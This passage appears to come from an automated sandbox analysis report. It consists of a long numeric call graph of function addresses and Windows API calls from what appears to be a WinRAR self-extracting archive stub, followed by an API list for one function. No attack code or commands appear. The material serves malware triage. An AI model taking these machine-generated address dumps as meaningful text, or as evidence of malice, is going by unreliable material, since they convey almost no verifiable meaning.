24668->24670 24669->24670 24670->24545 24671->24545 24672->24545 24673->24559 24674->24545 24675->24545 24676->24545 24678 bf8e54 24677->24678 24679 bf8e6c 24678->24679 24680 bf8e61 24678->24680 24682 bf8e74 24679->24682 24688 bf8e7d _abort 24679->24688 24681 bf8e06 __vsnwprintf_l 21 API calls 24680->24681 24687 bf8e69 24681->24687 24685 bf8dcc _free 20 API calls 24682->24685 24683 bf8ea7 HeapReAlloc 24683->24687 24683->24688 24684 bf8e82 24690 bf91a8 20 API calls _abort 24684->24690 24685->24687 24687->24545 24688->24683 24688->24684 24691 bf7a5e 7 API calls 2 library calls 24688->24691 24690->24687 24691->24688 24693 be0666 _wcslen 24692->24693 24720 bd17e9 24693->24720 24695 be067e 24695->24563 24697 be0659 _wcslen 24696->24697 24698 bd17e9 78 API calls 24697->24698 24699 be067e 24698->24699 24699->24565 24701 bd7b17 __EH_prolog 24700->24701 24737 bdce40 24701->24737 24703 bd7b32 24704 beeb38 8 API calls 24703->24704 24705 bd7b5c 24704->24705 24743 be4a76 24705->24743 24708 bd7c7d 24709 bd7c87 24708->24709 24711 bd7cf1 24709->24711 24772 bda56d 24709->24772 24714 bd7d50 24711->24714 24750 bd8284 24711->24750 24712 bd7d92 24712->24569 24714->24712 24778 bd138b 74 API calls 24714->24778 24717 bd7bac 24716->24717 24719 bd7bb3 24716->24719 24718 be2297 86 API calls 24717->24718 24718->24719 24721 bd17ff 24720->24721 24732 bd185a __InternalCxxFrameHandler 24720->24732 24722 bd1828 24721->24722 24733 bd6c36 76 API calls __vswprintf_c_l 24721->24733 24723 bd1887 24722->24723 24729 bd1847 ___std_exception_copy 24722->24729 24725 bf3e3e 22 API calls 24723->24725 24728 bd188e 24725->24728 24726 bd181e 24734 bd6ca7 75 API calls 24726->24734 24728->24732 24736 bd6ca7 75 API calls 24728->24736 24729->24732 24735 bd6ca7 75 API calls 24729->24735 24732->24695 24733->24726 24734->24722 24735->24732 24736->24732 24738 bdce4a __EH_prolog 24737->24738 24739 beeb38 8 API calls 24738->24739 24741 bdce8d 24739->24741 24740 beeb38 8 API calls 24742 bdceb1 24740->24742 24741->24740 24742->24703 24744 be4a80 __EH_prolog 24743->24744 24745 beeb38 8 API calls 24744->24745 24746 be4a9c 24745->24746 24747 bd7b8b 24746->24747 24749 be0e46 80 API calls 24746->24749 24747->24708 24749->24747 24751 bd828e __EH_prolog 24750->24751 24779 bd13dc 24751->24779 24753 bd82aa 24754 bd82bb 24753->24754 24922 bd9f42 24753->24922 24757 bd82f2 24754->24757 24787 bd1a04 24754->24787 24918 bd1692 24757->24918 24760 bd8389 24806 bd8430 24760->24806 24764 bd83e8 24814 bd1f6d 24764->24814 24767 bd83f3 24767->24757 24818 bd3b2d 24767->24818 24830 bd848e 24767->24830 24769 bda56d 7 API calls 24770 bd82ee 24769->24770 24770->24757 24770->24760 24770->24769 24926 bdc0c5 CompareStringW _wcslen 24770->24926 24773 bda582 24772->24773 24774 bda5b0 24773->24774 25186 bda69b 24773->25186 24774->24709 24776 bda592 24776->24774 24777 bda597 FindClose 24776->24777 24777->24774 24778->24712 24780 bd13e1 __EH_prolog 24779->24780 24781 bdce40 8 API calls 24780->24781 24782 bd1419 24781->24782 24783 beeb38 8 API calls 24782->24783 24786 bd1474 _abort 24782->24786 24784 bd1461 24783->24784 24784->24786 24927 bdb505 24784->24927 24786->24753 24788 bd1a0e __EH_prolog 24787->24788 24800 bd1a61 24788->24800 24803 bd1b9b 24788->24803 24943 bd13ba 24788->24943 24790 bd1bc7 24946 bd138b 74 API calls 24790->24946 24793 bd1bd4 24794 bd3b2d 101 API calls 24793->24794 24793->24803 24799 bd1c12 24794->24799 24795 bd1c5a 24798 bd1c8d 24795->24798 24795->24803 24947 bd138b 74 API calls 24795->24947 24797 bd3b2d 101 API calls 24797->24799 24798->24803 24805 bd9e80 79 API calls 24798->24805 24799->24795 24799->24797 24800->24790 24800->24793 24800->24803 24801 bd3b2d 101 API calls 24802 bd1cde 24801->24802 24802->24801 24802->24803 24803->24770 24804 bd9e80 79 API calls 24804->24800 24805->24802 24965 bdcf3d 24806->24965 24808 bd8440 24969 be13d2 GetSystemTime SystemTimeToFileTime 24808->24969 24810 bd83a3 24810->24764 24811 be1b66 24810->24811 24970 bede6b 24811->24970 24815 bd1f72 __EH_prolog 24814->24815 24817 bd1fa6 24815->24817 24978 bd19af 24815->24978 24817->24767 24819 bd3b3d 24818->24819 24820 bd3b39 24818->24820 24829 bd9e80 79 API calls 24819->24829 24820->24767 24821 bd3b4f 24822 bd3b78 24821->24822 24824 bd3b6a 24821->24824 25109 bd286b 101 API calls 3 library calls 24822->25109 24823 bd3baa 24823->24767 24824->24823 25108 bd32f7 89 API calls 2 library calls 24824->25108 24827 bd3b76 24827->24823 25110 bd20d7 74 API calls 24827->25110 24829->24821 24831 bd8498 __EH_prolog 24830->24831 24836 bd84d5 24831->24836 24849 bd8513 24831->24849 25135 be8c8d 103 API calls 24831->25135 24832 bd84f5 24834 bd851c 24832->24834 24835 bd84fa 24832->24835 24834->24849 25137 be8c8d 103 API calls 24834->25137 24835->24849 25136 bd7a0d 152 API calls 24835->25136 24836->24832 24838 bd857a 24836->24838 24836->24849 24838->24849 25111 bd5d1a 24838->25111 24841 bd8605 24841->24849 25117 bd8167 24841->25117 24844 bd8797 24845 bda56d 7 API calls 24844->24845 24846 bd8802 24844->24846 24845->24846 25123 bd7c0d 24846->25123 24848 bdd051 82 API calls 24855 bd885d 24848->24855 24849->24767 24850 bd898b 25140 bd2021 74 API calls 24850->25140 24851 bd8992 24852 bd8a5f 24851->24852 24859 bd89e1 24851->24859 24856 bd8ab6 24852->24856 24871 bd8a6a 24852->24871 24855->24848 24855->24849 24855->24850 24855->24851 25138 bd8117 84 API calls 24855->25138 25139 bd2021 74 API calls 24855->25139 24863 bd8a4c 24856->24863 25143 bd7fc0 97 API calls 24856->25143 24857 bd8b14 24860 bd9105 24857->24860 24878 bd8b82 24857->24878 25144 bd98bc 24857->25144 24858 bd8ab4 24864 bd959a 80 API calls 24858->24864 24859->24857 24859->24863 24865 bda231 3 API calls 24859->24865 24862 bd959a 80 API calls 24860->24862 24862->24849 24863->24857 24863->24858 24864->24849 24866 bd8a19 24865->24866 24866->24863 25141 bd92a3 97 API calls 24866->25141 24867 bdab1a 8 API calls 24869 bd8bd1 24867->24869 24872 bdab1a 8 API calls 24869->24872 24871->24858 25142 bd7db2 101 API calls 24871->25142 24889 bd8be7 24872->24889 24876 bd8b70 25148 bd6e98 77 API calls 24876->25148 24878->24867 24879 bd8d18 24882 bd8d8a 24879->24882 24883 bd8d28 24879->24883 24880 bd8e40 24884 bd8e66 24880->24884 24885 bd8e52 24880->24885 24904 bd8d49 24880->24904 24881 bd8cbc 24881->24879 24881->24880 24890 bd8167 19 API calls 24882->24890 24886 bd8d6e 24883->24886 24895 bd8d37 24883->24895 24888 be3377 75 API calls 24884->24888 24887 bd9215 123 API calls 24885->24887 24886->24904 25151 bd77b8 111 API calls 24886->25151 24887->24904 24891 bd8e7f 24888->24891 24889->24881 24892 bd8c93 24889->24892 24898 bd981a 79 API calls 24889->24898 24894 bd8dbd 24890->24894 25154 be3020 123 API calls 24891->25154 24892->24881 25149 bd9a3c 82 API calls 24892->25149 24900 bd8df5 24894->24900 24901 bd8de6 24894->24901 24894->24904 25150 bd2021 74 API calls 24895->25150 24898->24892 25153 bd9155 93 API calls __EH_prolog 24900->25153 25152 bd7542 85 API calls 24901->25152 24909 bd8f85 24904->24909 25155 bd2021 74 API calls 24904->25155 24906 bd9090 24906->24860 24907 bda4ed 3 API calls 24906->24907 24910 bd90eb 24907->24910 24908 bd903e 25130 bd9da2 24908->25130 24909->24860 24909->24906 24909->24908 25129 bd9f09 SetEndOfFile 24909->25129 24910->24860 25156 bd2021 74 API calls 24910->25156 24913 bd9085 24915 bd9620 77 API calls 24913->24915 24915->24906 24916 bd90fb 25157 bd6dcb 76 API calls 24916->25157 24919 bd16a4 24918->24919 25173 bdcee1 24919->25173 24923 bd9f59 24922->24923 24924 bd9f63 24923->24924 25185 bd6d0c 78 API calls 24923->25185 24924->24754 24926->24770 24928 bdb50f __EH_prolog 24927->24928 24933 bdf1d0 82 API calls 24928->24933 24930 bdb521 24934 bdb61e 24930->24934 24933->24930 24935 bdb630 _abort 24934->24935 24938 be10dc 24935->24938 24941 be109e GetCurrentProcess GetProcessAffinityMask 24938->24941 24942 bdb597 24941->24942 24942->24786 24948 bd1732 24943->24948 24945 bd13d6 24945->24804 24946->24803 24947->24798 24949 bd1748 24948->24949 24960 bd17a0 __InternalCxxFrameHandler 24948->24960 24950 bd1771 24949->24950 24961 bd6c36 76 API calls __vswprintf_c_l 24949->24961 24952 bd17c7 24950->24952 24955 bd178d ___std_exception_copy 24950->24955 24954 bf3e3e 22 API calls 24952->24954 24953 bd1767 24962 bd6ca7 75 API calls 24953->24962 24957 bd17ce 24954->24957 24955->24960 24963 bd6ca7 75 API calls 24955->24963 24957->24960 24964 bd6ca7 75 API calls 24957->24964 24960->24945 24961->24953 24962->24950 24963->24960 24964->24960 24966 bdcf4d 24965->24966 24967 bdcf54 24965->24967 24968 bd981a 79 API calls 24966->24968 24967->24808 24968->24967 24969->24810 24971 bede78 24970->24971 24972 bde617 53 API calls 24971->24972 24973 bede9b 24972->24973 24974 bd4092 _swprintf 51 API calls 24973->24974 24975 bedead 24974->24975 24976 bed4d4 16 API calls 24975->24976 24977 be1b7c 24976->24977 24977->24764 24979 bd19bf 24978->24979 24980 bd19bb 24978->24980 24982 bd18f6 24979->24982 24980->24817 24983 bd1908 24982->24983 24984 bd1945 24982->24984 24985 bd3b2d 101 API calls 24983->24985 24990 bd3fa3 24984->24990 24988 bd1928 24985->24988 24988->24980 24994 bd3fac 24990->24994 24991 bd3b2d 101 API calls 24991->24994 24992 bd1966 24992->24988 24995 bd1e50 24992->24995 24994->24991 24994->24992 25007 be0e08 24994->25007 24996 bd1e5a __EH_prolog 24995->24996 25015 bd3bba 24996->25015 24998 bd1e84 24999 bd1732 78 API calls 24998->24999 25001 bd1f0b 24998->25001 25000 bd1e9b 24999->25000 25043 bd18a9 78 API calls 25000->25043 25001->24988 25003 bd1eb3 25005 bd1ebf _wcslen 25003->25005 25044 be1b84 MultiByteToWideChar 25003->25044 25045 bd18a9 78 API calls 25005->25045 25009 be0e0f 25007->25009 25008 be0e2a 25011 be0e3b SetThreadExecutionState 25008->25011 25014 bd6c31 RaiseException CallUnexpected 25008->25014 25009->25008 25013 bd6c31 RaiseException CallUnexpected 25009->25013 25011->24994 25013->25008 25014->25011 25016 bd3bc4 __EH_prolog 25015->25016 25017 bd3bda 25016->25017 25018 bd3bf6 25016->25018 25071 bd138b 74 API calls 25017->25071 25020 bd3e51 25018->25020 25023 bd3c22 25018->25023 25088 bd138b 74 API calls 25020->25088 25022 bd3be5 25022->24998 25023->25022 25046 be3377 25023->25046 25025 bd3ca3 25026 bd3d2e 25025->25026 25042 bd3c9a 25025->25042 25074 bdd051 25025->25074 25056 bdab1a 25026->25056 25027 bd3c9f 25027->25025 25073 bd20bd 78 API calls 25027->25073 25029 bd3c8f 25072 bd138b 74 API calls 25029->25072 25030 bd3c71 25030->25025 25030->25027 25030->25029 25032 bd3d41 25036 bd3dd7 25032->25036 25037 bd3dc7 25032->25037 25080 be3020 123 API calls 25036->25080 25060 bd9215 25037->25060 25040 bd3dd5 25040->25042 25081 bd2021 74 API calls 25040->25081 25082 be2297 25042->25082 25043->25003 25044->25005 25045->25001 25047 be338c 25046->25047 25049 be3396 ___std_exception_copy 25046->25049 25089 bd6ca7 75 API calls 25047->25089 25050 be34c6 25049->25050 25051 be341c 25049->25051 25055 be3440 _abort 25049->25055 25091 bf238d RaiseException 25050->25091 25090 be32aa 75 API calls 3 library calls 25051->25090 25054 be34f2 25055->25030 25057 bdab28 25056->25057 25059 bdab32 25056->25059 25058 beeb38 8 API calls 25057->25058 25058->25059 25059->25032 25061 bd921f __EH_prolog 25060->25061 25092 bd7c64 25061->25092 25064 bd13ba 78 API calls 25065 bd9231 25064->25065 25095 bdd114 25065->25095 25067 bd928a 25067->25040 25068 bd9243 25068->25067 25070 bdd114 118 API calls 25068->25070 25104 bdd300 97 API calls __InternalCxxFrameHandler 25068->25104 25070->25068 25071->25022 25072->25042 25073->25025 25075 bdd084 25074->25075 25076 bdd072 25074->25076 25106 bd603a 82 API calls 25075->25106 25105 bd603a 82 API calls 25076->25105 25079 bdd07c 25079->25026 25080->25040 25081->25042 25083 be22a1 25082->25083 25084 be22ba 25083->25084 25087 be22ce 25083->25087 25107 be0eed 86 API calls 25084->25107 25086 be22c1 25086->25087 25088->25022 25089->25049 25090->25055 25091->25054 25093 bdb146 GetVersionExW 25092->25093 25094 bd7c69 25093->25094 25094->25064 25098 bdd12a __InternalCxxFrameHandler 25095->25098 25096 bdd29a 25097 bdd2ce 25096->25097 25099 bdd0cb 6 API calls 25096->25099 25100 be0e08 SetThreadExecutionState RaiseException 25097->25100 25098->25096 25101 bdd291 25098->25101 25102 be8c8d 103 API calls 25098->25102 25103 bdac05 91 API calls 25098->25103 25099->25097 25100->25101 25101->25068 25102->25098 25103->25098 25104->25068 25105->25079 25106->25079 25107->25086 25108->24827 25109->24827 25110->24823 25112 bd5d2a 25111->25112 25158 bd5c4b 25112->25158 25114 bd5d95 25114->24841 25116 bd5d5d 25116->25114 25163 bdb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25116->25163 25118 bd8186 25117->25118 25119 bd8232 25118->25119 25170 bdbe5e 19 API calls __InternalCxxFrameHandler 25118->25170 25169 be1fac CharUpperW 25119->25169 25122 bd823b 25122->24844 25124 bd7c22 25123->25124 25125 bd7c5a 25124->25125 25171 bd6e7a 74 API calls 25124->25171 25125->24855 25127 bd7c52 25172 bd138b 74 API calls 25127->25172 25129->24908 25131 bd9db3 25130->25131 25134 bd9dc2 25130->25134 25132 bd9db9 FlushFileBuffers 25131->25132 25131->25134 25132->25134 25133 bd9e3f SetFileTime 25133->24913 25134->25133 25135->24836 25136->24849 25137->24849 25138->24855 25139->24855 25140->24851 25141->24863 25142->24858 25143->24863 25145 bd98c5 GetFileType 25144->25145 25146 bd8b5a 25144->25146 25145->25146 25146->24878 25147 bd2021 74 API calls 25146->25147 25147->24876 25148->24878 25149->24881 25150->24904 25151->24904 25152->24904 25153->24904 25154->24904 25155->24909 25156->24916 25157->24860 25164 bd5b48 25158->25164 25161 bd5b48 2 API calls 25162 bd5c6c 25161->25162 25162->25116 25163->25116 25166 bd5b52 25164->25166 25165 bd5c3a 25165->25161 25165->25162 25166->25165 25168 bdb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25166->25168 25168->25166 25169->25122 25170->25119 25171->25127 25172->25125 25177 bdcef2 25173->25177 25175 bdcf24 25176 bda99e 86 API calls 25175->25176 25178 bdcf2f 25176->25178 25179 bda99e 25177->25179 25180 bda9c1 25179->25180 25183 bda9d5 25179->25183 25184 be0eed 86 API calls 25180->25184 25182 bda9c8 25182->25183 25183->25175 25184->25182 25185->24924 25187 bda6a8 25186->25187 25188 bda727 FindNextFileW 25187->25188 25189 bda6c1 FindFirstFileW 25187->25189 25190 bda732 GetLastError 25188->25190 25196 bda709 25188->25196 25191 bda6d0 25189->25191 25189->25196 25190->25196 25192 bdbb03 GetCurrentDirectoryW 25191->25192 25193 bda6e0 25192->25193 25194 bda6fe GetLastError 25193->25194 25195 bda6e4 FindFirstFileW 25193->25195 25194->25196 25195->25194 25195->25196 25196->24776 25197->24578 25198->24586 25199->24586 25200->24589 25201->24597 25203 bd9f42 78 API calls 25202->25203 25204 bd1fe8 25203->25204 25205 bd1a04 101 API calls 25204->25205 25207 bd2005 25204->25207 25206 bd1ff5 25205->25206 25206->25207 25209 bd138b 74 API calls 25206->25209 25207->24605 25207->24606 25209->25207 25211 beb5bc GetDlgItem 25210->25211 25212 beb583 GetMessageW 25210->25212 25211->24616 25211->24617 25213 beb5a8 TranslateMessage DispatchMessageW 25212->25213 25214 beb599 IsDialogMessageW 25212->25214 25213->25211 25214->25211 25214->25213 25328 be94e0 GetClientRect 25362 be21e0 26 API calls std::bad_exception::bad_exception 25379 bef2e0 46 API calls __RTC_Initialize 25380 bfbee0 GetCommandLineA GetCommandLineW 25329 c008a0 IsProcessorFeaturePresent 25381 bf0ada 51 API calls 2 library calls 25278 bd10d5 25283 bd5abd 25278->25283 25284 bd5ac7 __EH_prolog 25283->25284 25285 bdb505 84 API calls 25284->25285 25286 bd5ad3 25285->25286 25290 bd5cac GetCurrentProcess GetProcessAffinityMask 25286->25290 25291 bee2d7 25293 bee1db 25291->25293 25292 bee85d ___delayLoadHelper2@8 14 API calls 25292->25293 25293->25292 25330 bef4d3 20 API calls 25297 bee1d1 14 API calls ___delayLoadHelper2@8 25400 bfa3d0 21 API calls 2 library calls 25384 be62ca 123 API calls __InternalCxxFrameHandler 25305 bedec2 25306 bedecf 25305->25306 25307 bde617 53 API calls 25306->25307 25308 bededc 25307->25308 25309 bd4092 _swprintf 51 API calls 25308->25309 25310 bedef1 SetDlgItemTextW 25309->25310 25311 beb568 5 API calls 25310->25311 25312 bedf0e 25311->25312 25364 beb5c0 100 API calls 25402 be77c0 118 API calls 25403 beffc0 RaiseException _com_error::_com_error CallUnexpected 25404 c01f40 CloseHandle 25365 bef530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25407 beff30 LocalFree 24123 bfbb30 24124 bfbb42 24123->24124 24125 bfbb39 24123->24125 24127 bfba27 24125->24127 24128 bf97e5 _abort 38 API calls 24127->24128 24129 bfba34 24128->24129 24147 bfbb4e 24129->24147 24131 bfba3c 24156 bfb7bb 24131->24156 24134 bfba53 24134->24124 24137 bfba96 24140 bf8dcc _free 20 API calls 24137->24140 24140->24134 24141 bfba91 24180 bf91a8 20 API calls _abort 24141->24180 24143 bfbada 24143->24137 24181 bfb691 26 API calls 24143->24181 24144 bfbaae 24144->24143 24145 bf8dcc _free 20 API calls 24144->24145 24145->24143 24148 bfbb5a __FrameHandler3::FrameUnwindToState 24147->24148 24149 bf97e5 _abort 38 API calls 24148->24149 24154 bfbb64 24149->24154 24151 bfbbe8 _abort 24151->24131 24154->24151 24155 bf8dcc _free 20 API calls 24154->24155 24182 bf8d24 38 API calls _abort 24154->24182 24183 bfac31 EnterCriticalSection 24154->24183 24184 bfbbdf LeaveCriticalSection _abort 24154->24184 24155->24154 24157 bf4636 __cftof 38 API calls 24156->24157 24158 bfb7cd 24157->24158 24159 bfb7ee 24158->24159 24160 bfb7dc GetOEMCP 24158->24160 24161 bfb805 24159->24161 24162 bfb7f3 GetACP 24159->24162 24160->24161 24161->24134 24163 bf8e06 24161->24163 24162->24161 24164 bf8e44 24163->24164 24169 bf8e14 _abort 24163->24169 24186 bf91a8 20 API calls _abort 24164->24186 24166 bf8e2f RtlAllocateHeap 24167 bf8e42 24166->24167 24166->24169 24167->24137 24170 bfbbf0 24167->24170 24169->24164 24169->24166 24185 bf7a5e 7 API calls 2 library calls 24169->24185 24171 bfb7bb 40 API calls 24170->24171 24172 bfbc0f 24171->24172 24175 bfbc60 IsValidCodePage 24172->24175 24177 bfbc16 24172->24177 24178 bfbc85 _abort 24172->24178 24173 befbbc _ValidateLocalCookies 5 API calls 24174 bfba89 24173->24174 24174->24141 24174->24144 24176 bfbc72 GetCPInfo 24175->24176 24175->24177 24176->24177 24176->24178 24177->24173 24187 bfb893 GetCPInfo 24178->24187 24180->24137 24181->24137 24183->24154 24184->24154 24185->24169 24186->24167 24193 bfb8cd 24187->24193 24196 bfb977 24187->24196 24189 befbbc _ValidateLocalCookies 5 API calls 24192 bfba23 24189->24192 24192->24177 24197 bfc988 24193->24197 24195 bfab78 __vsnwprintf_l 43 API calls 24195->24196 24196->24189 24198 bf4636 __cftof 38 API calls 24197->24198 24199 bfc9a8 MultiByteToWideChar 24198->24199 24201 bfc9e6 24199->24201 24208 bfca7e 24199->24208 24203 bf8e06 __vsnwprintf_l 21 API calls 24201->24203 24207 bfca07 _abort __vsnwprintf_l 24201->24207 24202 befbbc _ValidateLocalCookies 5 API calls 24204 bfb92e 24202->24204 24203->24207 24211 bfab78 24204->24211 24205 bfca78 24216 bfabc3 20 API calls _free 24205->24216 24207->24205 24209 bfca4c MultiByteToWideChar 24207->24209 24208->24202 24209->24205 24210 bfca68 GetStringTypeW 24209->24210 24210->24205 24212 bf4636 __cftof 38 API calls 24211->24212 24213 bfab8b 24212->24213 24217 bfa95b 24213->24217 24216->24208 24221 bfa976 __vsnwprintf_l 24217->24221 24218 bfa99c MultiByteToWideChar 24219 bfa9c6 24218->24219 24220 bfab50 24218->24220 24224 bf8e06 __vsnwprintf_l 21 API calls 24219->24224 24227 bfa9e7 __vsnwprintf_l 24219->24227 24222 befbbc _ValidateLocalCookies 5 API calls 24220->24222 24221->24218 24223 bfab63 24222->24223 24223->24195 24224->24227 24225 bfaa9c 24253 bfabc3 20 API calls _free 24225->24253 24226 bfaa30 MultiByteToWideChar 24226->24225 24228 bfaa49 24226->24228 24227->24225 24227->24226 24244 bfaf6c 24228->24244 24232 bfaaab 24234 bf8e06 __vsnwprintf_l 21 API calls 24232->24234 24237 bfaacc __vsnwprintf_l 24232->24237 24233 bfaa73 24233->24225 24235 bfaf6c __vsnwprintf_l 11 API calls 24233->24235 24234->24237 24235->24225 24236 bfab41 24252 bfabc3 20 API calls _free 24236->24252 24237->24236 24238 bfaf6c __vsnwprintf_l 11 API calls 24237->24238 24240 bfab20 24238->24240 24240->24236 24241 bfab2f WideCharToMultiByte 24240->24241 24241->24236 24242 bfab6f 24241->24242 24254 bfabc3 20 API calls _free 24242->24254 24245 bfac98 _abort 5 API calls 24244->24245 24246 bfaf93 24245->24246 24249 bfaf9c 24246->24249 24255 bfaff4 10 API calls 3 library calls 24246->24255 24248 bfafdc LCMapStringW 24248->24249 24250 befbbc _ValidateLocalCookies 5 API calls 24249->24250 24251 bfaa60 24250->24251 24251->24225 24251->24232 24251->24233 24252->24225 24253->24220 24254->24225 24255->24248 25333 bfc030 GetProcessHeap 25366 bfb4ae 27 API calls _ValidateLocalCookies 25335 bd1025 29 API calls 25336 bff421 21 API calls __vsnwprintf_l 25385 bec220 93 API calls _swprintf 25410 bd1710 86 API calls 25368 bead10 73 API calls 25339 bea400 GdipDisposeImage GdipFree 25386 bed600 70 API calls 25340 bf6000 QueryPerformanceFrequency QueryPerformanceCounter 25371 bf2900 6 API calls 4 library calls 25387 bff200 51 API calls 25411 bfa700 21 API calls 24277 bd9f7a 24278 bd9f8f 24277->24278 24279 bd9f88 24277->24279 24280 bd9f9c GetStdHandle 24278->24280 24284 bd9fab 24278->24284 24280->24284 24281 bda003 WriteFile 24281->24284 24282 bd9fcf 24283 bd9fd4 WriteFile 24282->24283 24282->24284 24283->24282 24283->24284 24284->24279 24284->24281 24284->24282 24284->24283 24286 bda095 24284->24286 24288 bd6baa 78 API calls 24284->24288 24289 bd6e98 77 API calls 24286->24289 24288->24284 24289->24279 25343 bd1075 84 API calls 24291 bd9a74 24295 bd9a7e 24291->24295 24292 bd9b9d SetFilePointer 24293 bd9ab1 24292->24293 24294 bd9bb6 GetLastError 24292->24294 24294->24293 24295->24292 24295->24293 24297 bd9b79 24295->24297 24298 bd981a 24295->24298 24297->24292 24299 bd9833 24298->24299 24301 bd9e80 79 API calls 24299->24301 24300 bd9865 24300->24297 24301->24300 25344 bea070 10 API calls 25388 beb270 99 API calls 25413 bd1f72 128 API calls __EH_prolog 25414 bf7f6e 52 API calls 2 library calls 25346 bec793 107 API calls 4 library calls 25389 bf8268 55 API calls _free 25217 becd58 25218 bece22 25217->25218 25224 becd7b 25217->25224 25229 bec793 _wcslen _wcsrchr 25218->25229 25245 bed78f 25218->25245 25219 beb314 ExpandEnvironmentStringsW 25219->25229 25221 bed40a 25223 be1fbb CompareStringW 25223->25224 25224->25218 25224->25223 25225 beca67 SetWindowTextW 25225->25229 25228 bf3e3e 22 API calls 25228->25229 25229->25219 25229->25221 25229->25225 25229->25228 25231 bec855 SetFileAttributesW 25229->25231 25236 becc31 GetDlgItem SetWindowTextW SendMessageW 25229->25236 25239 becc71 SendMessageW 25229->25239 25244 be1fbb CompareStringW 25229->25244 25269 bea64d GetCurrentDirectoryW 25229->25269 25271 bda5d1 6 API calls 25229->25271 25272 bda55a FindClose 25229->25272 25273 beb48e 76 API calls 2 library calls 25229->25273 25233 bec90f GetFileAttributesW 25231->25233 25243 bec86f _abort _wcslen 25231->25243 25233->25229 25235 bec921 DeleteFileW 25233->25235 25235->25229 25237 bec932 25235->25237 25236->25229 25238 bd4092 _swprintf 51 API calls 25237->25238 25240 bec952 GetFileAttributesW 25238->25240 25239->25229 25240->25237 25241 bec967 MoveFileW 25240->25241 25241->25229 25242 bec97f MoveFileExW 25241->25242 25242->25229 25243->25229 25243->25233 25270 bdb991 51 API calls 2 library calls 25243->25270 25244->25229 25247 bed799 _abort _wcslen 25245->25247 25246 bed9e7 25246->25229 25247->25246 25248 bed8a5 25247->25248 25249 bed9c0 25247->25249 25274 be1fbb CompareStringW 25247->25274 25251 bda231 3 API calls 25248->25251 25249->25246 25252 bed9de ShowWindow 25249->25252 25253 bed8ba 25251->25253 25252->25246 25254 bed8d9 ShellExecuteExW 25253->25254 25275 bdb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25253->25275 25254->25246 25261 bed8ec 25254->25261 25256 bed8d1 25256->25254 25257 bed925 25276 bedc3b 6 API calls 25257->25276 25258 bed97b CloseHandle 25259 bed994 25258->25259 25260 bed989 25258->25260 25259->25249 25277 be1fbb CompareStringW 25260->25277 25261->25257 25261->25258 25263 bed91b ShowWindow 25261->25263 25263->25257 25265 bed93d 25265->25258 25266 bed950 GetExitCodeProcess 25265->25266 25266->25258 25267 bed963 25266->25267 25267->25258 25269->25229 25270->25243 25271->25229 25272->25229 25273->25229 25274->25248 25275->25256 25276->25265 25277->25259 25348 bee455 14 API calls ___delayLoadHelper2@8 25295 bfc051 31 API calls _ValidateLocalCookies 25350 bea440 GdipCloneImage GdipAlloc 25391 bf3a40 5 API calls _ValidateLocalCookies

                                                            Executed Functions

                                                            Function 00BEDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00BE0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00BE087C
                                                              • Part of subcall function 00BE0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BE088E
                                                              • Part of subcall function 00BE0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BE08BF
                                                              • Part of subcall function 00BEA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00BEA655
                                                              • Part of subcall function 00BEAC16: OleInitialize.OLE32(00000000), ref: 00BEAC2F
                                                              • Part of subcall function 00BEAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BEAC66
                                                              • Part of subcall function 00BEAC16: SHGetMalloc.SHELL32(00C18438), ref: 00BEAC70
                                                            • GetCommandLineW.KERNEL32 ref: 00BEDF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00BEDF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00BEDF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00BEDFCE
                                                              • Part of subcall function 00BEDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BEDBF4
                                                              • Part of subcall function 00BEDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BEDC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 00BEDFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,00C2EC90,00000800), ref: 00BEDFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,00C2EC90), ref: 00BEDFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 00BEE009
                                                            • _swprintf.LIBCMT ref: 00BEE048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00BEE05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00BEE061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 00BEE078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00BEE0C9
                                                            • Sleep.KERNEL32(?), ref: 00BEE0F7
                                                            • DeleteObject.GDI32 ref: 00BEE130
                                                            • DeleteObject.GDI32(?), ref: 00BEE140
                                                            • CloseHandle.KERNEL32 ref: 00BEE183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
